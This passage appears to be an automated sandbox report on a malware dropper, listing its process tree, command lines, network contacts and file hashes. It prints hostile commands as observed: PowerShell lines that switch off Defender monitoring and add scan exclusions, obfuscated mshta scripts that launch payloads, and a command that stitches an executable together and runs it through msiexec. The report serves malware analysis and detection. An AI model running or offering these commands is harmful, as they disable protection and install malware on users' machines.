PID 2812 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2788 wrote to memory of 2452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2788 wrote to memory of 2452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2788 wrote to memory of 2452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2788 wrote to memory of 2452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2788 wrote to memory of 2452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2788 wrote to memory of 2452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2788 wrote to memory of 2452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2540 wrote to memory of 2980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2540 wrote to memory of 2980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2540 wrote to memory of 2980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2540 wrote to memory of 2980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2540 wrote to memory of 2980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2540 wrote to memory of 2980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2540 wrote to memory of 2980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe

"C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14f1396dfcf191bd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142b09ae40c44cf.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14514904a4b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14d32a38896785b13.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14febbc433.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142ac5249376e895.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1487ca754e680f91.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat144474a564d26f29.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14b47e86b9c16b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1427fbafcf251.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1481f5a7e3eccdd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14a7594cc5a0116.exe

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14f1396dfcf191bd.exe

Sat14f1396dfcf191bd.exe

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14d32a38896785b13.exe

Sat14d32a38896785b13.exe

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat142ac5249376e895.exe

Sat142ac5249376e895.exe

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14febbc433.exe

Sat14febbc433.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1487ca754e680f91.exe

Sat1487ca754e680f91.exe

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe

Sat1481f5a7e3eccdd.exe

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe

Sat14b47e86b9c16b.exe

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14514904a4b.exe

Sat14514904a4b.exe

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat144474a564d26f29.exe

Sat144474a564d26f29.exe

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1427fbafcf251.exe

Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14a7594cc5a0116.exe

Sat14a7594cc5a0116.exe

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat142b09ae40c44cf.exe

Sat142b09ae40c44cf.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1844 -s 272

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat142b09ae40c44cf.exe"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If """" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat142b09ae40c44cf.exe"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat142b09ae40c44cf.exe" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "" == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat142b09ae40c44cf.exe" ) do taskkill -iM "%~NXf" /f

C:\Users\Admin\AppData\Local\Temp\is-3JM8J.tmp\Sat1481f5a7e3eccdd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-3JM8J.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$A0192,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe"

C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE

JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Sat142b09ae40c44cf.exe" /f

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe

"C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe" /SILENT

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If ""/p~P_UpSUZjMkOKsY "" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )

C:\Users\Admin\AppData\Local\Temp\is-S2RMT.tmp\Sat1481f5a7e3eccdd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-S2RMT.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$B0192,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "/p~P_UpSUZjMkOKsY " == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" ) do taskkill -iM "%~NXf" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbSCriPT: CLOSe (CReAteoBject ( "wSCRiPt.SHeLL" ). Run ( "CmD.exE /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = ""MZ"" >PajLCM.4 & CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q + 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7 " , 0 , truE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = "MZ" >PajLCM.4& CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q + 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ecHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>PajLCM.4"

C:\Windows\SysWOW64\msiexec.exe

msiexec -y .\2KSA.GF7

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1427fbafcf251.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2812 -s 460

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 marianu.xyz udp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 gcl-gb.biz udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
N/A 127.0.0.1:49285 tcp
N/A 127.0.0.1:49287 tcp
US 8.8.8.8:53 ppgggb.com udp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
NL 194.104.136.5:46013 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 104.26.3.46:443 iplogger.org tcp
NL 194.104.136.5:46013 tcp
US 172.67.133.215:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 www.microsoft.com udp
NO 96.6.17.223:80 www.microsoft.com tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
US 72.84.118.132:8080 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
US 72.84.118.132:8080 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 72.247.176.59:80 r11.o.lencr.org tcp
US 8.8.8.8:53 www.microsoft.com udp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp

Files

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 c12fe256228c8c0403ef35279aca6f58
SHA1 840a4eaf832f3cd154f0766dbc415a32c181e200
SHA256 86271c0587581b77766414a1238238011c10a5a06255b4611ac3b058f4529c2b
SHA512 88689761f0eeedc4ff633744dab15b26ad7352bda1f0329ed920dce463118ea11a14249cfd636aa3d39dbdabbcb1342138b7b5255a3791faf8ad955c63f5ff11

\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe

MD5 47a5d34f871487a79975e5586e63ebdd
SHA1 75f4f1708c2b0a6433f8c0fa6ff47799115b2d2f
SHA256 884c76e10ef7f202b677c0ccfb6e9e009ca79e7189e76509a6449b5f8c2a952f
SHA512 3f96662af4937647a78a0a51cb4916f56ee250ab14094ed608344d727489eb0135b4016a73853ca1f96b165fbe9ac7957adb1cc884fff55cea837f668b157d04

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2812-66-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

\Users\Admin\AppData\Local\Temp\7zS02AB0786\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2812-63-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2812-76-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2812-83-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2812-82-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2812-81-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2812-80-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2812-79-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2812-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2812-77-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2812-75-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2812-74-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS02AB0786\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zS02AB0786\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14d32a38896785b13.exe

MD5 148c3657379750b2fe7237ac1b06f507
SHA1 c464da9412a32ab71cd62491405296672c7ba3ad
SHA256 41a780cbf232d3ed4912406bdbb084f61c9faf56dcc0a7a81381546689170c64
SHA512 360588010bda2d3d514508fe9f2f95f63ca7a78476e24043985c350814c54f25c1f60c45e68e4431c2301f90b4092f88866624b12eb637145403592e7218d6bc

\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe

MD5 77666d51bc3fc167013811198dc282f6
SHA1 18e03eb6b95fd2e5b51186886f661dcedc791759
SHA256 6a3d44d750ba258b1854431d89db135abc5d543ada1b384c5306e98031b8f1c9
SHA512 a024f008567a7417fe975063f661a0b278fb70c7576a7453e482f2e3f5c6cc48b5faaa55ec197e3082626faaa3598c9ff7bcca798ba7a1408bf666e61fdf4cd0

\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14febbc433.exe

MD5 4d255e96e5056f2c899884babcc55691
SHA1 44caeb1df6288c94081b805ee17f66db34dc7834
SHA256 e7678a0537796c6199bbc7fc5c143b475280564558250df218d62012c3b98506
SHA512 ad2cebd784a525d3fe2e3523c4f3d2ab793da84811a41b08aae99141d9c53f545b180d36f05647ddef04bba200b6a0fc917e481913f3b2b0162c136ec8355c44

memory/1084-132-0x0000000000400000-0x0000000000414000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1427fbafcf251.exe

MD5 8e0abf31bbb7005be2893af10fcceaa9
SHA1 a48259c2346d7aed8cf14566d066695a8c2db55c
SHA256 2df6cc430475ae053ad2772a3a9d1de1a03af31c3ebfdd0e5d5bd7fbdc61866a
SHA512 ba76470f4896e6bdac508e6a901b352a3bf731ab5680b9931cc1a8c874482cf0c19a374a6a58dda5237178c1861509529a5174bf76fa768efac7989dbc1c1970

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XHM9ZABCM83EO8K3Z5VR.temp

MD5 ca32eabf1ff39cab952641aa57105242
SHA1 53a02fde7e6409608c85e03ee79e36a5bba8b422
SHA256 54bb52c4274084187e980c025a90d0ff3d5c4057cfda4ff71744925537c0e2d4
SHA512 760e50d683ff79579b4009860287ed8ff32241687f181981e26f33dfdd7277f6c89f93c25bb5054e1bb526b3e328a8ef96f80bba66af5cce583548832d98da58

\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14514904a4b.exe

MD5 bdbbf4f034c9f43e4ab00002eb78b990
SHA1 99c655c40434d634691ea1d189b5883f34890179
SHA256 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512 dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec

\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe

MD5 9b07fc470646ce890bcb860a5fb55f13
SHA1 ef01d45abaf5060a0b32319e0509968f6be3082f
SHA256 506c6ee68b29701403739da25679b640d21b1b121f45dde5bc25705901a6ed0b
SHA512 4cc1b725c6fb539d832d2d5315bbc63e967a41129d25c2102b2df19e4931e4e06c2a9f70a3336d98b9e031c636d021e713f10dbbd86a57f447a7581221a470cc

\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat144474a564d26f29.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

memory/3012-136-0x0000000000170000-0x0000000000188000-memory.dmp

memory/2548-135-0x0000000000AB0000-0x0000000000AB8000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1487ca754e680f91.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

memory/2188-141-0x00000000011A0000-0x0000000001208000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat142ac5249376e895.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

memory/1276-156-0x0000000000400000-0x0000000000414000-memory.dmp

memory/3012-155-0x0000000000160000-0x0000000000166000-memory.dmp

memory/1084-154-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1780-153-0x0000000000400000-0x00000000004BD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE

MD5 a1d90c2ea649aae4d9492b584c52ef5c
SHA1 32969454090b6dd84a9b97d19bd58845cda5aae6
SHA256 64f7fc506342b8fd9bf09d45a012f9c996237e06cffbade5d3aedb1c8d967023
SHA512 09bf2aa523933dc05fb23a6d97f56ba33ba5894667b62f2275a4e94b86e9ac82d6faeda7dfdc0ac1c966fe13b0be29ae98158850d815021bd88837a3453b6e73

C:\Users\Admin\AppData\Local\Temp\is-S2RMT.tmp\Sat1481f5a7e3eccdd.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14f1396dfcf191bd.exe

MD5 15c6dc87edd001c0bf0df6f9405ad7db
SHA1 9582017cd83642ffdac143daeed13e840f4b2350
SHA256 5e7a5af6e0cea11934feaa716867e906644eb20df743b1c5fa85558de0c1b10d
SHA512 6fffd09475af31c9cdc56f561c13921975c236c6590ede369e5d863469452a6224d2ee9550d9f73fb65696c9d46185e487bf0764922c95831882a8029151603f

C:\Users\Admin\AppData\Local\Temp\is-8PO24.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
